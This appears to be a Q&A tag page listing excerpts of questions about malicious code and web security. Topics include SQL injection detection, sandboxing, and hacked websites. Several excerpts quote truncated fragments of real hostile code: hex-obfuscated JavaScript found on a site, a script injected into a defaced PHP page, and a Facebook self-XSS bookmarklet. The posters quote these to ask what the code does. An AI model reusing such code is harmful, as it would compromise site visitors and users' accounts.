malicious

Catching SQL Injection and other Malicious Web Requests

I am looking for a tool that can detect malicious requests (such as obvious SQL injection gets or posts) and will immediately ban the IP address of the requester/add to a blacklist. I know, I know, the code should be able to handle such requests accordingly but there is still value in such a tool even when the site is safe from such at...

Security in programming?

What is the best book to read about security issues that should be kept in mind while programming? What should a C++ programmer know about security? Is it worth buying any one of the following books? If so, which one should I get? Secure Coding In C & C++; Secure Programming Cookbook for C and C++; Writing Secure code ...

How does the ACM ICPC Online Judge prevent malicious attacks?

I've spent more than a few hours humbling myself on the ACM ICPC's problem set archive, and I've wondered how the online judge is able to compile and run source code from any user and prevent malicious attacks to their system. Are the compiled binaries run from some kind of limited sandbox? How would one go about setting up this kind o...

Normalizing achievements with multiple sources

I'm looking for a good algorithm recommendation. I have Users and Achievements. Users create Achievements and then give them to other Users. Associated with each Achievement is the point value that the user specifies. A User's total points is the sum of all their achievements. Basically: Achievement : owner = Alias points = in...

Hide a C# program from the task manager?

Is there any way to hide a C# program from the Windows Task Manager? EDIT: Thanks for the overwhelming response! Well I didn't intend to do something spooky. Just wanted to win a bet with my friend that I can do it without him noticing. And I'm not a geek myself to be able to write a rootkit, as someone suggested though I'd love to know...

How does this mess work?

My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'l...

How to prevent arbitrary code execution vulnerability in our programs?

You always read in changelogs when your system or browser or any program updates that they fixed a bug that made possible that an attacker can execute any code in your computer with a forged website, or attacking your computer with carefully forged packets, etc... Because you read it so often that means any program can have similar vuln...

Malicious javascript code in my website

I found this code in my website sourcecode: var _0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"]; var _0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]]; var _0xcd6e=[_0x9ae4[5],_0x9ae4[0],_0x9ae...

What makes you trust that a piece of open source software is not malicious?

We developers are in a unique position when it comes to the ability to not only be skeptical about the capabilities provided by open source software, but to actively analyze the code since it is freely available. In fact, one may even argue that open source software developers have a social responsibility to do so to contribute to the c...

What does this script do? Is it malicious?

This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below.... var GU = ''; var h; var X = new String(); var mP = ""; H = function () { var F = ["hu"]; function L(Lc, O, d) { ...

What is this weird script I found on facebook?

Not so much a question to help my own programming, but I found this page on facebook with a cool illusion and a page that says "to see the real illusion, copy and paste this code into your address bar" and there is a script: DISCLAIMER: DO NOT RUN THE FOLLOWING CODE javascript:(function(){a='app129556453726651_fsDszN'; b='app1295564537...

Embedding Javascript Within an Image File

I've noticed a new trend in distributing potentially unsafe code where people will post an image to a server with a watermark suggesting that they change the filename to have a .HTA file extension. I realized that .HTA was an HTML Application file, which are implicitly trusted by Microsoft's logic and can contain code to do just about a...

In Java, what are the packages containing operating system level commands?

I want to detect whether a given program can perform malicious operations like forking, interprocess piping, input/output redirection, file handling etc. Actually I am developing a program that checks Java code and do not want the coder to harm my code checker system in any way. What are the packages I should look for in code to en...

Can loading and resizing an uploaded image be dangerous?

I have an ASP.NET form with an upload control for users to post an image. On the server I load that image (using the Bitmap class) and resize it. Is there any danger in doing that when users upload malicious or affected files or will the code just throw an exception at some point and stop the whole process? ...